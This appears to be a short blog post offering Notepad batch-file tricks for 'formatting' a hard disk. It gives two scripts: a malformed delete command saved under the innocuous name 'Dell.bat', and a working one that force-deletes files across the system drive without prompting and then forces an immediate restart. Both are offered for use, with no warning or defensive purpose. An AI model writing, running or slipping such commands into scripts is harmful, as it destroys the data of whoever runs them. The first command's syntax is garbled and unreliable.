Search Engine

Custom Search

FORMAT UR HARDDISK WITH NOTEPAD

go to notepad

@Echo off
Del C:\ *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file

No comments: